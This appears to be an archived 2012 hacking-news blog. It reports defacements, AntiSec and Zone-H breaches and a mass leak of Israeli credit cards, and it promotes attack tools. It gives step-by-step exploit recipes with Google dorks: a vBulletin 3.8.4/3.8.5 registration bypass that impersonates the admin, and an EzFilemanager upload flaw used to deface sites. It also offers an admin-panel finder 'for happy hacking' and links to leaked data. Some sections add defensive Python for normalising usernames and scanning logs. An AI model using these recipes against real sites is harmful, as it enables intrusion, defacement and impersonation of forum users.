Thursday, 26 January 2012

100+ Pakistani websites hacked by ICA-INDISHELL


Once again Pakistani cyberspace has been hit by ICA-INDISHELL. This time FfeSsxt Prince, H3r0 and Magnum Sniper have hacked 40+ Pakistani websites. The message they posted on the deface page is as follows:
We aren't afraid of any shit that comes to us !! We'll Do anything to Keep our Country's Pride Up and High !! Jihaad = War = Shit. One Person gives u bayaan on Jihaad and encourages you to kill people and says "ye sawaab ka kaam hai","rizzak ka kaam hai" and you do sins even without thinking the consequences !! But you Don't Know That Terrorism is unnecessary violence against innocent civilians; Qur'aan forbids this. You have read the Qur'aan, you should know this & yet if you are supporting Terrorism means you aren't Muslim. We are Proud of People we have in India who are ready to deal with any such incidents !! Officers, Soldiers who are ready to die for their Motherland.

They have posted the list of websites on Pastebin.

click here to see the list

Tuesday, 24 January 2012

FTC OWNED BY ANTISEC


After the Library of Congress, the FTC has been owned by AntiSec due to SOPA / PIPA / ACTA.
They have posted this message on Pastebin: “If SOPA/PIPA/ACTA passes we will wage a relentless war against the corporate internet, destroying dozens upon dozens of government and company websites. As you are reading this we are amassing our allied armies of darkness, preparing boatloads of stolen booty for our next raid. We are sitting on hundreds of rooted servers, getting ready to drop all your mysql dumps and mail spools. Your passwords? Your precious bank accounts? Even your online dating details?! You ain't even trying to step to this.”


You can see leaked data here

Zone-H Hacked

The leading deface mirroring website (www.zone-h.com) has been hacked by HcJ & Cyb3R-1sT & Egyptian.H4x0rZ & Sas-TerrOrisT & H311 c0d3 & Red Virus.
The hackers claimed that they rooted the server, hacking:
www.zone-h.com
www.zone-h.org
www.zone-h.com.br
forum.zone-h.com.br
br.zone-h.org
www.zone-h.net
The hackers added this message to their deface:

"To be OR not TO be

Note : It's Unacceptable when we tried to notify defaced.zone-h.net and found this message " nice try" it's not a try it's a real! your server rooted, all the websites hacked, all people knew that ! and it's the third time to hack your websites 2 of them in 2010( 2010/04/02 > brazilian domains + 06/2010 zone-h.com defacement database ),and now ! you should have the courage and allow the defacers to notify your sites, it's the real courage !"

The reason they gave was that zone-h didn't submit the deface of its own website (defaced.zone-h.net), giving the message "Nice Try" instead.

This isn't the first time zone-h has been hacked; it was hacked before in 2010 as well.

Saturday, 21 January 2012

Library of Congress USA HACKED BY SECTOR 404 #OPMEGAUPLOAD


Library of Congress USA HACKED BY SECTOR 404 #OPMEGAUPLOAD. The FBI has shut down Megaupload due to SOPA, and Anonymous has DDoSed FBI.gov. After that, today SECTOR 404 hacked the Library of Congress. You can see the leaked data here.

Friday, 20 January 2012

Mobius Forensic Toolkit 0.5.10 – Forensics Framework To Manage Cases & Case Items

Mobius Forensic Toolkit is a forensic framework written in Python/GTK that manages cases and case items, providing an abstract interface for developing extensions. Cases and item categories are defined using XML files for easy integration with other tools.








Installation

As root, type:

python setup.py install

Usage

Run mobius_bin.py.

You can download Mobius 0.5.10 here:
mobiusft-0.5.10.tar.gz

mobiusft-0.5.10.zip

Wednesday, 18 January 2012

THA (The Hackers Army) official website got hacked !!

The Hackers Army hacked more than 1K innocent sites for #op free PALESTAIN, challenged HaXroot and told them “HaXroot you are noob !!”. After that, the official website of THA (The Hackers Army) got hacked by HaX.R00T, CFR Robot Pirate and Pakos Hacker!





HaXroot has posted a snapshot of the comments.

You can see the hacked website and mirror here:

website : http://www.thehackersarmy.net/

mirror : http://www.zone-hack.com/defacements/?id=39294

Wednesday, 11 January 2012

Admin finder perl script

The things you need:
1. ActivePerl (click here to download)
2. The admin finder script (click here to download)
Install ActivePerl and extract the archive into “c:\perl\bin”. Go to Start > Run, type CMD and hit Enter. Type “cd c:\perl\bin” and hit Enter, then type the Perl script name “admin_CP_finder.pl” and hit Enter. Enter the site whose admin panel you want to find and hit Enter (I have hidden my site), then enter the source code type of the website (my site has ASP source code, so I entered 2) and hit Enter. You will find the admin panel. Happy hacking.

Tuesday, 10 January 2012

vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability

Software Link: http://www.vbulletin.org
Version: 3.8.4 & 3.8.5
Google dork 1 : powered by vBulletin 3.8.4
Google dork 2 : powered by vBulletin 3.8.5
Platform / Tested on: Multiple
Category: webapplications
BUG :
1 . Go to Http://[localhost]/path/register.php
2 . Assume that forum admin user name is ADMIN
3 . Type this at User Name ===> ADMIN&#00
4 . &#00 is an ASCII Code

5 . And complete the other parameters
6 . Then click on Complete Registration
7 . Now you see that your user name looks like the admin user name. After this, the private messages sent to the user (ADMIN) are sent to you.

Patch :
1 . Go to AdminCP
2 . Click on vBulletin Options and choose vBulletin Options
3 . Choose Censorship Options
4 . type &# in Censored Words section
5 . Then click on Save

This works only with vBulletin 3.8.4 and 3.8.5. If it doesn't work, that means someone else has already used the username you want, so try another admin's username. If it still doesn't work, that means they have fixed this problem.
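The censored-word workaround above blocks the literal string &#. As an added example (not vBulletin code and not part of the original post), the following Python sketch shows a more general registration-time check that rejects character references and invisible characters and compares names in the form a reader would see; the function names and the sample accounts are hypothetical.

```python
import html
import unicodedata


def canonical(name):
    """Reduce a username to roughly what a reader sees once it is rendered in HTML."""
    decoded = html.unescape(name)                     # "&#65;" -> "A", "&#00" -> U+FFFD
    decoded = unicodedata.normalize("NFKC", decoded)  # fold full-width and similar forms
    visible = [c for c in decoded
               if c != "\ufffd" and unicodedata.category(c)[0] != "C"]
    return "".join(visible).strip().casefold()


def check_username(candidate, existing):
    """Return (allowed, reason) for a new registration using `candidate`."""
    if html.unescape(candidate) != candidate:
        return False, "contains an HTML character reference"
    if any(unicodedata.category(c)[0] == "C" for c in candidate):
        return False, "contains a control or invisible character"
    canon = canonical(candidate)
    if not canon:
        return False, "empty after normalisation"
    for name in existing:
        if canonical(name) == canon:
            return False, f"renders the same as existing user {name!r}"
    return True, "ok"


# Constructed sample data: one existing account and a few registration attempts.
EXISTING = ["ADMIN"]
ATTEMPTS = ["ADMIN&#00", "admin\u200b", "Admin", "alice"]

if __name__ == "__main__":
    for attempt in ATTEMPTS:
        print(repr(attempt), check_username(attempt, EXISTING))
```

Running the same `canonical()` comparison over the existing user table also lists accounts that already collide with a staff name.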

Monday, 09 January 2012

Blind Cat: A Blind SQL Injection Exploitation Tool


Blind Cat is not a fully automated tool of the kind we call “one click ownage”. You are the driving force behind this tool. Once you understand how this tool works, you will be able to exploit a lot more difficult SQL injections easily. Consider this tool as an automation tool/front-end for manual blind SQL injections.





Saturday, 07 January 2012

Israel treating hackers like terrorists

The message from Deputy Foreign Minister Dany Ayalon came after a self-defined "Saudi hacker" from a cabal known as "group-xp" published details of more than 6,000 Israeli credit cards online: "The US has announced that any attack on its cybernetic space would be considered a declaration of war and that it would go as far as firing missiles to respond to such an attack. This is a good criterion for us all".

Israel said that it will respond to cyber-attacks in the same way it responds to violent terrorist acts, by striking back with force against hackers who threaten the Jewish state.

Almost immediately after an Israeli computer expert declared the hacker's true identity to be 19-year-old Mexican waiter Omar Habib, the Israeli website Ynet claimed the real hacker contacted them via email to mock the false identification.

"If a stupid student thinks he can find me (within) 8 hours of work, what will Mossad do? But I'm still here and no one can find me, make sure, no worries," said Saudi hacker 0xOmar of "group-XP".

"It is necessary to send a message to everyone who attacks or tries to attack Israel, including in cyberspace, that they are putting themselves in danger and that they will not benefit from any immunity against reprisal actions from Israel" Ayalon said.

After examining the details, Israel's major credit card companies said only 14,000 valid cards had been exposed.

Thursday, 05 January 2012

EzFilemanager Deface Upload vulnerability

Google dork for EzFilemanager is “inurl:ezfilemanager/ezfilemanager.php”

(you can modify this dork to get more results from Google)

Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file

Go to this URL: website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and put ?sa=1&type=file after the URL.

The URL will now be: http://website/PATH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
You will now see the upload option and can upload .html, .pdf, .ppt, .txt, .doc, .rtf, .xml, .xsl, .dtd, .zip, .rar, .jpg and .png files.
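For site owners, the request described above is easy to spot in web server logs. This added example (not part of the original post) scans access-log lines in the common/combined format for direct requests to ezfilemanager.php with sa=1&type=file, and for POSTs to the same script; the log lines are constructed samples and the function name is hypothetical.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Common/combined log format: ip, identity, user, [time], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (documentation-range addresses), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [05/Jan/2012:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120
198.51.100.7 - - [05/Jan/2012:10:02:11 +0000] "GET /includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file HTTP/1.1" 200 8342
198.51.100.7 - - [05/Jan/2012:10:02:40 +0000] "POST /includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file HTTP/1.1" 200 912
203.0.113.5 - - [05/Jan/2012:10:05:00 +0000] "GET /tiny_mce/plugins/EzFilemanager/ezfilemanager.php?type=file&sa=1 HTTP/1.1" 404 210
"""


def find_ezfilemanager_hits(log_text):
    """Return one dict per request that reached for the standalone file manager."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/ezfilemanager/ezfilemanager.php"):
            continue
        query = parse_qs(url.query)
        direct = query.get("sa") == ["1"] and query.get("type") == ["file"]
        upload = m["method"] == "POST"
        if direct or upload:
            hits.append({
                "ip": m["ip"],
                "time": m["ts"],
                "method": m["method"],
                "status": int(m["status"]),
                # A 2xx answer means the page was served; a POST may be an upload.
                "served": m["status"].startswith("2"),
                "possible_upload": upload,
            })
    return hits


if __name__ == "__main__":
    for hit in find_ezfilemanager_hits(SAMPLE_LOG):
        print(hit)
```

Hits with a 2xx status and a POST are the ones to check against the upload directory for unexpected .html files.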


Wednesday, 04 January 2012

BackBox Linux 2.01 released


The BackBox team is proud to announce release 2.01 of BackBox Linux. The new release includes features such as Ubuntu 11.04, Linux Kernel 2.6.38 and Xfce 4.8.0. The ISO images (32-bit & 64-bit) can be downloaded from the following location: http://www.backbox.org/downloads
What's new

  • System upgrade
  • Performance boost
  • New look
  • Improved start menu
  • Bug corrections
  • New sections such as Forensic Analysis, Documentation & Reporting and Reverse Engineering
  • New Hacking tools and updated tools such as dradis 2.8, ettercap 0.7.4.2, john 1.7.8, metasploit 4.2, nmap 5.51, set 2.5.2, sleuthkit 3.2.1, w3af 1.0, weevely 0.5, wireshark 1.6.3, etc.

System requirements

  • 32-bit or 64-bit processor
  • 256 MB of system memory (RAM)
  • 4.4 GB of disk space for installation
  • Graphics card capable of 800×600 resolution
  • DVD-ROM drive or USB port

Tuesday, 03 January 2012

400000 Israeli Credit Cards & Information Leaked by Saudi Arabia Hackers


A hacker named "0xOmar" from group-xp, the largest Wahhabi hacker group of Saudi Arabia, claims to have hacked a lot of Israeli servers and a lot of information about Israeli people, including their name, address, city, zipcode, Social Security Numbers (Israeli ID numbers), mobile phone number, home phone number and credit card number (including exp year, month and CVV). According to announcements from the credit card companies, 6,600 of the stolen cards belong to Isracard Ltd., 4,000 to Leumi Card Ltd., and 3,000 to Israel Credit Cards-Cal Ltd. (ICC-Cal) (Visa).

The hacker says "We daily use these cards to solve our problems, purchasing VPNs, VPSes, softwares, renting GPU clusters, renting cloud servers and much more!". They claim to be part of the Anonymous hacking group from Saudi Arabia. "my goal is reaching 1 million non-duplicate people, which is 1/6 of Israel's population." he said.

Quick Description of Leaked Data at Pastebin:

  • 4000.htm, it includes 4000+ credit cards and all needed information. All is Israeli.
  • 27000.htm, it includes 27000+ credit cards and all needed information. All is Israeli.
  • Cards1.mdb, it includes 260272 credit cards and all needed information. It includes address, emails and passwords of 260272 Israeli people.
  • Cards2.mdb, it includes 120745 credit cards and all needed information. It includes address, emails and passwords of 120745 Israeli people.
  • IsraCards1.txt, it includes 184 working fresh Israeli credit cards and all needed information.
  • Business.mdb, it includes 22604 Israeli business people details, including, names, addresses, phone numbers, passwords, etc.
  • Judaism.txt, it includes 65 Zionist people who purchased stuff from Judaism web site
  • TblDonate.htm, it includes 500+ people who donated to Israeli Zionist Rabbis.

In response to the cyber attack, Dov Kotler, CEO of Isracard, a unit of Bank Hapoalim said that the credit-card user details that appeared on the page were mostly incorrect or belonged to the cards that were deactivated long ago. The leaked data also contains numerous repeated entries. The credit card companies immediately blocked all the cards on the list and assured the customers that money used to buy from these cards will be duly returned.

Monday, 02 January 2012

Patator – Multi Purpose Brute Forcing Tool

Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. Basically the author got tired of using Medusa, Hydra, ncrack, metasploit auxiliary modules, nmap NSE scripts and the like because:

  • They either do not work or are not reliable (false negatives several times in the past)
  • They are slow (not multi-threaded or not testing multiple passwords within the same TCP connection)
  • They lack very useful features that are easy to code in python (eg. interactive runtime)

Basically you should give Patator a try once you get disappointed by Medusa, Hydra or other brute-force tools and are about to code your own small script because Patator will allow you to:

  • Not write the same code over and over
  • Run multi-threaded
  • Benefit from useful features such as the interactive runtime commands, response logging, etc.

Currently it supports the following modules:

  • ftp_login : Brute-force FTP
  • ssh_login : Brute-force SSH
  • telnet_login : Brute-force Telnet
  • smtp_login : Brute-force SMTP
  • smtp_vrfy : Enumerate valid users using the SMTP VRFY command
  • smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
  • http_fuzz : Brute-force HTTP/HTTPS
  • pop_passd : Brute-force poppassd (not POP3)
  • ldap_login : Brute-force LDAP
  • smb_login : Brute-force SMB
  • mssql_login : Brute-force MSSQL
  • oracle_login : Brute-force Oracle
  • mysql_login : Brute-force MySQL
  • pgsql_login : Brute-force PostgreSQL
  • vnc_login : Brute-force VNC
  • dns_forward : Forward lookup subdomains
  • dns_reverse : Reverse lookup subnets
  • snmp_login : Brute-force SNMPv1/2 and SNMPv3
  • unzip_pass : Brute-force the password of encrypted ZIP files
  • keystore_pass : Brute-force the password of Java keystore files

The name “Patator” comes from this tv interview clip – patator

Patator is NOT script-kiddie friendly, please read the README inside patator.py before reporting/complaining/asking me how to use this tool.

You can download Patator v0.3 here:

patator_v0.3.py